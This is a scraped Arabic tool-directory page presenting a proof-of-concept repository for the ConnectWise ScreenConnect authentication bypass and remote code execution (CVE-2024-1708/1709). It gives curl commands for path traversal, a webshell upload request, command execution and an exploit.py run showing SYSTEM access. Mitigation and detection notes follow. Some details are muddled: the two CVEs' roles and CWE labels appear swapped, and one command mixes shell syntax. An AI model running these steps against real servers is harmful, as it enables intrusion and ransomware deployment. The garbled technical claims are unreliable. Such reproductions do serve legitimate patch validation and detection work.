Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2024-1708-connectwise_rce_reproduction — إعادة إنتاج cve-2024-1708-connectwise_rce_reproduction | Kitploit
أدوات/GitHubGitHub/razureink/cve-2024-1708-connectwise_rce_reproduction
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالتعلم والتعليمالفريق الأحمرتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
razureink/cve-2024-1708-connectwise_rce_reproduction

cve-2024-1708-connectwise_rce_reproduction

إعادة إنتاج cve-2024-1708-connectwise_rce_reproduction

عرض المستودع
منذ 27 أياملم تتم المراجعة بعد

CVE-2024-1708 / CVE-2024-1709 — تجاوز المصادقة وتنفيذ التعليمات البرمجية عن بُعد في ConnectWise ScreenConnect

درجة CVSS: 8.4 (CVE-2024-1708) – 10.0 (CVE-2024-1709)
CWE: CWE-22 (اجتياز المسار)، CWE-288 (تجاوز المصادقة باستخدام مسار بديل)
البرنامج المتأثر: ConnectWise ScreenConnect (المعروف سابقًا باسم ScreenConnect) ≤ 23.9.7
تم الاكتشاف والإبلاغ: فبراير 2024
تم استغلالها في البرية: LockBit وBlack Basta وBl00dy ومجموعات أخرى تابعة لبرامج الفدية


جدول المحتويات

  1. نظرة عامة
  2. التفاصيل التقنية
  3. الإصدارات المتأثرة
  4. خطوات إعادة الإنتاج
  5. استخدام إثبات المفهوم
  6. التخفيف
  7. المراجع

1. نظرة عامة

CVE-2024-1708 وCVE-2024-1709 هما ثغرتان متسلسلتان في ConnectWise ScreenConnect (المعروف سابقًا باسم ConnectWise Control) تسمحان معًا لمهاجم بعيد غير مصادق بتحقيق تنفيذ كامل للتعليمات البرمجية عن بُعد على خادم ScreenConnect.

  • CVE-2024-1708 — تجاوز المصادقة عبر اجتياز المسار. لا يقوم معرّض النهاية SetupWizard.aspx (ومعرّضات الإعداد/الترقية ذات الصلة) بتعقيم تسلسلات اجتياز المسار المقدمة من المستخدم (../) بشكل صحيح. يمكن لمهاجم غير مصادق الاجتياز خارج دليل الإعداد المخصص والوصول إلى معرّضات نهاية تتطلب مصادقة. ولأن المعالج يعمل في سياق حساب SYSTEM (ويندوز) أو root (لينكس)، يرث المهاجم صلاحيات مرتفعة.

  • CVE-2024-1709 — رفع ملفات غير مقيد يؤدي إلى RCE. بمجرد تجاوز المصادقة، يمكن للمهاجم رفع ملف .aspx تعسفي أو أي ملف قابل للتنفيذ إلى جذر الويب. وبطلب الملف المرفوع بعد ذلك، يتم تنفيذ تعليمات برمجية تعسفية على الخادم.

التأثير

تم استغلال هاتين الثغرتين على نطاق واسع ابتداءً من 19 فبراير 2024 من قبل مجموعات متعددة من برامج الفدية:

مجموعة برامج الفديةملاحظات الحملة
LockBitمسح واسع النطاق لنسخ ScreenConnect؛ استُخدم لنشر مشفّر LockBit في المراحل اللاحقة.
Black Bastaاستغلت الوصول إلى مزودي الخدمات المُدارة (MSPs) للتنقل داخل شبكات العملاء المُدارين.
Bl00dyحملات أصغر نطاقًا استهدفت خوادم ScreenConnect غير المحدثة.

نظرًا لأن ScreenConnect يُنشر عادةً من قبل مزودي الخدمات المُدارة (MSPs) لإدارة مئات نقاط النهاية للعملاء عن بُعد، فإن اختراق خادم ScreenConnect واحد يمكّن من هجوم سلسلة التوريد — كل عميل لديه وكيل متصل بذلك الخادم يكون معرضًا للخطر.


2. التفاصيل التقنية

2.1 تجاوز المصادقة (CVE-2024-1708)

يعرّض خادم ScreenConnect معالج إعداد عند:

root@kitploit:~
/SetupWizard.aspx/

في حالات ترقية/إصلاح معينة، لا يفرض الخادم المصادقة لأنه يفترض أن معالج الإعداد هو تجربة التشغيل الأولى. الخلل الحرج يكمن في كيفية معالجة الخادم لملف تعريف الارتباط __Session أو ترويسات Transfer-Encoding / Content-Type عند الوصول إلى مسارات ضمن مساحة اسم المعالج.

بإرسال طلب إلى:

root@kitploit:~
/SetupWizard.aspx/../../ScreenConnect/Login.aspx

يلغي اجتياز المسار سياق "معالج الإعداد"، بينما لا يزال الخادم يعتقد أن سياق الجلسة غير المصادق ينطبق. يتم إعادة توجيه المهاجم أو تقديم الصفحات له كما لو كان مصادقًا.

متجه بديل: معالجا PrepareUpgrade.aspx / PostUpgrade.aspx يفتقران بالمثل إلى فحوصات مصادقة ويعرّضان وظيفة رفع الملفات.

2.2 تنفيذ التعليمات البرمجية عن بُعد (CVE-2024-1709)

بمجرد وصول المهاجم إلى معرّض نهاية مصادق (أو الوصول مباشرة إلى معالج رفع الملفات في سياق الإعداد)، يمكنهم رفع ويب شيل .aspx خبيث:

root@kitploit:~
POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
Content-Type: multipart/form-data; boundary=----BOUNDARY

------BOUNDARY
Content-Disposition: form-data; name="file"; filename="shell.aspx"
Content-Type: application/octet-stream

<%@ Page Language="C#" %>...
------BOUNDARY--

يُكتب الملف إلى دليل تطبيق الويب (مثل C:\Program Files\ScreenConnect\Website\). طلب الشيل المرفوع يؤدي إلى تنفيذه بهوية الخادم.

2.3 السبب الجذري (CWE-22 / CWE-288)

  • يفشل الخادم في توحيد مسار الطلب (canonicalize) قبل التوجيه.
  • يثق معالج SetupWizard.aspx بأن أي طلب ضمن مساره هو جزء من عملية الإعداد ويجب أن يتجاوز المصادقة — لكن اجتياز المسار يكسر هذا الافتراض.
  • لا يوجد تحقق مناسب من تسلسلات ../ أو اجتياز الروابط الرمزية.

3. الإصدارات المتأثرة

نطاق الإصدارالحالة
23.9.7 وما دونمعرضة للخطر
23.9.8تم إصلاحها (صدر في 20 فبراير 2024)
23.9.9تم إصلاحها
23.9.10 (الأحدث)تم إصلاحها

ملاحظة: خوادم ScreenConnect المستضافة ذاتيًا (داخل المنشأة) هي الأهداف الأساسية. تم إصلاح نسخ ScreenConnect المستضافة لدى ConnectWise (السحابية) قبل الإفصاح العام ولم تكن معرضة للخطر أبدًا.


4. خطوات إعادة الإنتاج

4.1 إعداد المختبر

  1. قم بتنزيل نسخة ScreenConnect معرضة للخطر (23.9.7 أو أقدم).
    قد تكون المثبّتات الرسمية متاحة عبر أرشيفات شركاء ConnectWise. للاختبار، استخدم جهازًا افتراضيًا معزولًا.
  2. ثبّت على Windows Server (2019/2022) أو مضيف Linux.
    • مسارات التثبيت الافتراضية:
      • ويندوز: C:\Program Files\ScreenConnect\
      • لينكس: /opt/screenconnect/
    • منفذ الويب الافتراضي: 8040 (HTTP) أو 443 (HTTPS إذا تم تكوينه)
  3. تأكد من عزل الخادم عن الشبكة — لا تعرضه للإنترنت أثناء الاختبار.

4.2 التحقق من الثغرة

root@kitploit:~
# Check the version
curl -s http://<target>:8040/ | Select-String "ScreenConnect"

أو قم بالوصول إلى الواجهة الإلكترونية ولاحظ رقم الإصدار في شفرة مصدر الصفحة.

4.3 اختبار اجتياز المسار

root@kitploit:~
curl -v --path-as-is "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/Login.aspx"

السلوك المتوقع على خادم معرض للخطر:

  • يُرجع الخادم استجابة 200 OK أو 302 redirect إلى صفحة مصادقة على الجلسة دون موجه تسجيل الدخول العادي.
  • قد تحتوي الاستجابة على HTML لوحة إدارة ScreenConnect.

4.4 رفع الويب شيل

root@kitploit:~
curl -X POST "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx" \
  -H "Content-Type: multipart/form-data; boundary=----BOUNDARY" \
  -F "[email protected]"

4.5 تنفيذ الأوامر

root@kitploit:~
curl "http://<target>:8040/shell.aspx?cmd=whoami"

5. استخدام إثبات المفهوم

يقوم السكربت المرفق exploit.py بأتمتة الخطوات المذكورة أعلاه:

root@kitploit:~
usage: exploit.py [-h] -t TARGET [-p PORT] [-c COMMAND] [--ssl]

Exploit CVE-2024-1708/1709 - ConnectWise ScreenConnect Auth Bypass + RCE

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target hostname or IP
  -p PORT, --port PORT  Target port (default: 8040)
  -c COMMAND, --command COMMAND
                        Command to execute (default: whoami)
  --ssl                 Use HTTPS

Example:
  python exploit.py -t 192.168.1.100 -p 8040 -c "whoami"

مثال على التشغيل

root@kitploit:~
$ python exploit.py -t 192.168.1.100 -c "whoami"

[*] Target: 192.168.1.100:8040
[*] Using SSL: False
[*] Step 1: Testing path traversal for auth bypass...
[+] Target appears vulnerable! Server version: 23.9.7
[*] Step 2: Uploading webshell...
[+] Webshell uploaded to: http://192.168.1.100:8040/PoCsAccSwLgSdE.aspx
[*] Step 3: Executing command 'whoami'...
[+] Output:
nt authority\system

6. التخفيف

إجراء فوري (تصحيح)

  • قم بترقية ScreenConnect إلى الإصدار 23.9.8 أو أحدث.
  • أصدرت ConnectWise تصحيحات في 20 فبراير 2024.

ضوابط تعويضية

الاكتشاف

ابحث عن مؤشرات الاختراق (IoCs) التالية في سجلات خادم الويب:

root@kitploit:~
GET /SetupWizard.aspx/../../ScreenConnect/
POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
GET /*.aspx?cmd=

7. المراجع


إخلاء المسؤولية

هذا المستودع مقدم لأغراض تعليمية وبحوث أمنية مصرح بها فقط. الاختبار غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها غير قانوني. المؤلفون غير مسؤولين عن إساءة استخدام هذه المعلومات.

تنزيل الأداة
الضابطالتنفيذ
قواعد WAFحظر الطلبات التي تحتوي على ../ في مسار URL بعد /SetupWizard.aspx/
تقسيم الشبكةوضع ScreenConnect في شبكة إدارة معزولة (VLAN) مع تصفية صارمة لحركة الخروج
التحكم في الوصولتقييد الوصول إلى واجهة الويب الخاصة بـ ScreenConnect على نطاقات IP موثوقة فقط
المراقبةالتنبيه على الطلبات الموجهة إلى /SetupWizard.aspx/ من مصادر خارجية، أو على إنشاء ملفات .aspx غير متوقعة في ScreenConnect\Website\
MFAعلى الرغم من أن MFA لن يوقف هذا (تجاوز المصادقة يحدث قبل تسجيل الدخول)، فرضه على جميع الحسابات الإدارية للدفاع المتعمق
المصدرالرابط
NVD - CVE-2024-1708https://nvd.nist.gov/vuln/detail/CVE-2024-1708
NVD - CVE-2024-1709https://nvd.nist.gov/vuln/detail/CVE-2024-1709
النشرة الأمنية من ConnectWisehttps://www.connectwise.com/company/trust/security-advisories
Huntress Labs - الإفصاح الأوليhttps://www.huntress.com/blog/mass-exploitation-of-connectwise-screenconnect
الثغرات المعروفة المستغلة لدى CISAhttps://www.cisa.gov/known-exploited-vulnerabilities
تقنية ATT&CK: الخدمات الخارجية عن بُعد (T1133)https://attack.mitre.org/techniques/T1133/